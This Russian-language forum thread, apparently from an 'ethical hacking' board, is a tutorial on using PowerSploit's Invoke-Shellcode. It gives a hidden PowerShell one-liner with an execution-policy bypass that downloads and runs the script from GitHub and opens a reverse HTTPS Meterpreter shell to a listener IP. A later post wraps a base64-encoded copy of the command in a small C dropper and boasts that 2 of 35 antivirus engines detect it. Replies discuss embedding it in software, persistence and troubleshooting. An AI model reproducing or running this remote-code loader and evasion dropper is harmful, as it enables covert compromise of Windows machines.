ANTICHAT

ANTICHAT (https://forum.antichat.io/index.php)
-   Этичный хакинг или пентестинг (https://forum.antichat.io/forumdisplay.php?f=209)
-   -   PowerShell для хакера (часть I ) (https://forum.antichat.io/showthread.php?t=558495)

<~DarkNode~> 25.11.2016 00:42

Часть 1
Следующая часть
Все части

Приветствую Вас колеги. Как Вы уже поняли речь пойдет о знакомствах с базовыми возможностями PowerShell и области применения хакерских техних.
И начнем мы пожалуй сегодня с использования скриптовPowerSploit -( скрипты написанные на PowerShell для пост эксплуатации Windows систем)

Первым примером использования PowerSploit - это будет пример простого и быстрого получения метерпретер сессии на примере скрипта Invoke-Shellcode.ps1

https://forum.antichat.xyz/attachmen...88adb8516d.png

Для начало сходим на гитхаб по ссылке:

Код:


Код:

https://github.com/cheetz/PowerSploit/blob/master/CodeExecution/Invoke--Shellcode.ps1
https://forum.antichat.xyz/attachments/4766699/1.png

Жмакним на клавишу RAW - что бы получить ссылку для скачивания в чистом виде

Код:


Код:

https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1
Эту ссылку мы потом используем для нашей команды PowerShell,а пока можно в скрипте в комментариях увидеть опциональные параметры и примеры для его запуска:

https://forum.antichat.xyz/attachments/4766699/3.png

Копируем урл нашего скрипта и готовим следующую команду:

Код:


Код:

Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.137.137 -Lport 1337 -Force
https://forum.antichat.xyz/attachments/4766699/5.png

https://forum.antichat.xyz/attachments/4766699/6.png

Собственно говоря и все)

Запускаем данную команду и к нам прилетает метерпретер сессия)
Можно еще для удобства сократить урл к скрипту на гитхабе через сервисы сокращения ссылок)

Всем спасибо) Продолжения следует)

Следующая часть
Все части

kot-gor 25.11.2016 18:41

добрый вечер.а если данный скрипт допустим встроить в софт, как с детектом антивирусов у его?

Vander 25.11.2016 20:04

Цитата:


kot-gor сказал(а):

добрый вечер.а если данный скрипт допустим встроить в софт, как с детектом антивирусов у его?


Присоединяюсь к вопросу...

<~DarkNode~> 25.11.2016 20:14

Завтра сделаю тест на детект.Сорри сегодня не успеваю)

pappa 26.11.2016 23:12

я полагаю если удаленно создать правило в исключениях фаервола то получится или я опять не права ?

kot-gor 27.11.2016 00:14

Цитата:


pappa сказал(а):

я полагаю если удаленно создать правило в исключениях фаервола то получится или я опять не права ?

не обязательно...

ipmann 29.11.2016 10:28

Symantec Endpoint Protection 12 этот скрипт прибивает..

kot-gor 29.11.2016 16:34

Добрый день, ну не во всех же стоит Symantec Endpoint Protection,какие то скрипты будут пробиваться..)

<~DarkNode~> 03.12.2016 01:46

Цитата:


~~DarkNode~~ сказал(а):

Завтра сделаю тест на детект.Сорри сегодня не успеваю)


Извините за редкий онлайн. Увлекся лабораторией тестирования на проникновения от PentestIT. После окончания прохождения вернусь к вам мои дорогие друзья)))

InK 04.12.2016 19:07

Огромное спасибо за статью, искал нечто подобное.

fumpc18 07.12.2016 18:58

Спасибо за статью,не подкинете пару книг по powershell?

<~DarkNode~> 07.12.2016 22:02

Цитата:


MAdDog719 сказал(а):

Пожалуйста напиши статью как проходил лабораторию.


Могу посвятить небольшой цикл статей в виде врайтапов по каждому токену(флагу) от моментов подключения до последнего токена.Как пользоваться картой топологии сети, простую логику поиска векторов уязвимости, и т.д
Имхо такие лаборатории очень наглядно демонстрируют известные векторы атак,и полезно попрактиковаться на них,так как команда специалистов делая лаборатории подбирают наиболее актуальные уязвимости которые попадают в статистику пентестов текущего года.
Если кому то будет интересно,то конечно могу)

valerian38 07.12.2016 22:30

Цитата:


~~DarkNode~~ сказал(а):

Могу посвятить небольшой цикл статей в виде врайтапов по каждому токену(флагу) от моментов подключения до последнего токена.Как пользоваться картой топологии сети, простую логику поиска векторов уязвимости, и т.д
Имхо такие лаборатории очень наглядно демонстрируют известные векторы атак,и полезно попрактиковаться на них,так как команда специалистов делая лаборатории подбирают наиболее актуальные уязвимости которые попадают в статистику пентестов текущего года.
Если кому то будет интересно,то конечно могу)


Если вы это сделаете, то я буду самым счастливым человеком на свете.

<~DarkNode~> 09.12.2016 09:33

Цитата:


valerian38 сказал(а):

Если вы это сделаете, то я буду самым счастливым человеком на свете.


https://codeby.net/threads/laborato...-xakerskix-vozmozhnostej-1.58573/#post-267531

<~DarkNode~> 10.12.2016 15:48

Цитата:


D8mbsniper сказал(а):

Неплохо.
Думаю такой скрипт с rubberducky должен "подружиться"

Обычно в этих целях его чаще используют)))

<~DarkNode~> 13.12.2016 17:00

Цитата:


D8mbsniper сказал(а):

Неплохо.
Думаю такой скрипт с rubberducky должен "подружиться"

Вот этот скриптец должен лучше помочь :
https://codeby.net/threads/vashi-programmy-na-python.58124/#post-266525
Писал для удобства.

<~DarkNode~> 14.12.2016 03:33

https://forum.antichat.xyz/attachmen...4c5d5b9378.png

Цитата:


kot-gor сказал(а):

добрый вечер.а если данный скрипт допустим встроить в софт, как с детектом антивирусов у его?


Тестанул вот на детект,весьма не плохо, 2/35 (правда аваспом палится) Но можно в принципе достич и фуда (FuD) если небольшие манипуляции сделать
http://NoDistribute.com/result/FkiQhHjaUrIZAsfWG

C:


Код:

#include
int
main
(
)
{
system
(
"powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AYwBoAGUAZQB0AHoALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGEAcwB0AGUAcgAvAEMAbwBkAGUARQB4AGUAYwB1AHQAaQBvAG4ALwBJAG4AdgBvAGsAZQAtAC0AUwBoAGUAbABsAGMAbwBkAGUALgBwAHMAMQAnACkAOwAgAEkAbgB2AG8AawBlAC0AUwBoAGUAbABsAGMAbwBkAGUAIAAtAFAAYQB5AGwAbwBhAGQAIAB3AGkAbgBkAG8AdwBzAC8AbQBlAHQAZQByAHAAcgBlAHQAZQByAC8AcgBlAHYAZQByAHMAZQBfAGgAdAB0AHAAcwAgAC0ATABoAG8AcwB0ACAAMQA5ADIALgAxADYAOAAuADIALgAxADAAMgAgAC0ATABwAG8AcgB0ACAAMQAzADMANwAgAC0ARgBvAHIAYwBlAA=="
)
;
return
0
;
}


<~DarkNode~> 10.01.2017 16:31

Цитата:


stilya сказал(а):

Ничего не понятно...что копировать и куда вставлять и что менять?


Ничего не копируйте,никуда не вставляйте -- это может причинить вред вашему компьютеру...

<~DarkNode~> 10.01.2017 17:00

Цитата:


stilya сказал(а):

А как же проверить работу всего этого мануала...да и что с ним будет...поставлю систему заново. делов то...15 минут


Мануал расчитан,на то что у людей которые его читают есть хоть какое то понятие о том что они делают. Вы уж простите ,но если вы ничего не поняли с этого мануала - то будет лучше для вас и окружающих если прекратите свои експеременты...

<~DarkNode~> 10.01.2017 17:18

Цитата:


stilya сказал(а):

Ну а как же понять...и как научиться никто не хочет помочь.
[doublepost=1484053847,1484053367][/doublepost]Как понял вы это делали на виртуалке...аналогично что на метасплойт кали линукс, если вы это имели ввиду...то конечно же это понятно...но работает ли это на реальных машинах...у меня есть два компа, на которых я могу третиноваться...может все-таки поможете?


Да, я демонстрирую это на виртуальных машинах:
Во первых - это этично
Во вторых - как вы себе представляете фото и видео на камеру таких демонстраций.
Интересно... Назовите причины , по которым это не будет работать на реальных устройствах.

aserf 02.02.2017 01:42

Спасибо, за статьи

ActionNum 14.02.2017 11:33

Спасибо за статью!)

d3l373d 14.02.2017 13:05

Цитата:


stilya сказал(а):

Причина как раз в том что машины на которых я тестирую реальные, их специально я отвел для ушатывания...через неделю другую системы будут хлопнуты и опять тестить...
и я не утверждал...только предположил...может быть именно в этом причина?
[doublepost=1484054627,1484054534][/doublepost]Почему я решил именно на реальных...потому что создавал прокси сервера на вирте...все работало, пока это решил сделать в реале...и пришлось идти на другие сайты и все по новому создавать от debian до sams


Запомни святую истину, всё, что работает в одном сегменте сети будет работать и в другом в том числе и в интернете

d3l373d 14.02.2017 14:44

Цитата:


Grafsky сказал(а):

Ааээмм, а разве ПШ актуален? Давайте еще проги на нем попишем, можно же.


Хааааххх. Начиная с вин 7, пауэршелл не просто акутален а стало основной пушкой которой до сих пор можно даже винду раздолбать. Совсем недавно я демонстрировал как подгрузить макрос с ПШ в ексельку.

animi 14.02.2017 22:36

что-то не получается. один ноут на win 7 на другом кали 1. запускаю на кали use exploit/multi/handler и set payload windows/meterpreter/reverse_https. в винде (Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('[S]link removed[/S] Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.37 -Lport 8443 -Force) lhost и lport одинаковый. сделал в винде Set-ExecutionPolicy Unrestricted отключил брандмауэр отключил контроль учетных записей и сессия не приходит. netstat -na не показывает соединения, но в процессы висят. в какую сторону копать?

Elektrolife 03.04.2017 15:32

Я наверное где то что то упустил.. На виндовой машине открываю PS,вписываю ссылку и свой реверс в команду,отправляю - PS захлопывается а сессия не прилетает. В чём проблема ?

d3l373d 03.04.2017 16:04

Цитата:


Elektrolife сказал(а):

Я наверное где то что то упустил.. На виндовой машине открываю PS,вписываю ссылку и свой реверс в команду,отправляю - PS захлопывается а сессия не прилетает. В чём проблема ?


Возьми https

Elektrolife 03.04.2017 16:19

Цитата:


SooLFaa сказал(а):

Возьми https


Эммм ? Хендлер запущен на meterpreter/reverse_https. Порт и адрес корректный. В PS строчке тоже всё корректно

d3l373d 03.04.2017 17:19

Что то блочит тебя. Тут я уже не волшебник, чтобы угадывать.

<~DarkNode~> 11.04.2017 16:44

Цитата:


Gl@balWar сказал(а):

Возник вопрос,возможно не по теме....Но как можно сохранить сессию по данному способу так,что бы к ней можно было подключиться из под другой сети ?


Это уже в сторону закрепления в системе.Просто персистенс сделать ,что бы в дальнейшем можно было подключаться к жертве.Но опять же таки если речь идет про реверс соединение ,то нам в любом случае нужно знать айпи машины для того что бы сделать на нее реверс конект

ActionNum 12.06.2017 15:42

Цитата:


animi сказал(а):

что-то не получается. один ноут на win 7 на другом кали 1. запускаю на кали use exploit/multi/handler и set payload windows/meterpreter/reverse_https. в винде (Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('[S]link removed[/S] Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.37 -Lport 8443 -Force) lhost и lport одинаковый. сделал в винде Set-ExecutionPolicy Unrestricted отключил брандмауэр отключил контроль учетных записей и сессия не приходит. netstat -na не показывает соединения, но в процессы висят. в какую сторону копать?


Для начала посмотри, точно ли у тебя все пинги проходят, от таргет компа до листнера и в обратную сторону.

Elektrolife 13.06.2017 10:58

Цитата:


stilya сказал(а):

Ну а как же понять...и как научиться никто не хочет помочь.
[doublepost=1484053847,1484053367][/doublepost]Как понял вы это делали на виртуалке...аналогично что на метасплойт кали линукс, если вы это имели ввиду...то конечно же это понятно...но работает ли это на реальных машинах...у меня есть два компа, на которых я могу третиноваться...может все-таки поможете?


Советую начать с курса CEH - Этичный хакинг и тестирование на проникновение. Поможет для общего понимания что и зачем делать.

Дядюшка Рик 23.11.2017 17:36

я тут взял эту штукенцию и проверил не менял айпи какой был такой и оставил нажал он куда отправился в какую вселенную можно потом от этого избавиться?)

<~DarkNode~> 14.12.2017 20:28

Цитата:


llein сказал(а):

Вопрос к компетентным товарищам - реально ли такое провернуть не со скриптом PS, а с exe?
И,да, перегонять в формат .ps1 через штатный exe2hex я пробовал, конечный скрипт не запускается. Через тот же самый IEX - тоже никак.
Поскажите, пожалуйста, я себе уже мозг сломал


Какая цель?
Создать из скрипта бинарный файл?
Или подгрузить бинарный файл?

Rike 25.12.2017 06:28

Defender палит(

Jack S 05.11.2019 01:27

Народ, такая ситуация, при запуске команды в ps он выдаёт что проверьте синтаксис и то что invokeshellcode не найдена хотя взял весь код и скопировал. Что может быть?


Время: 18:36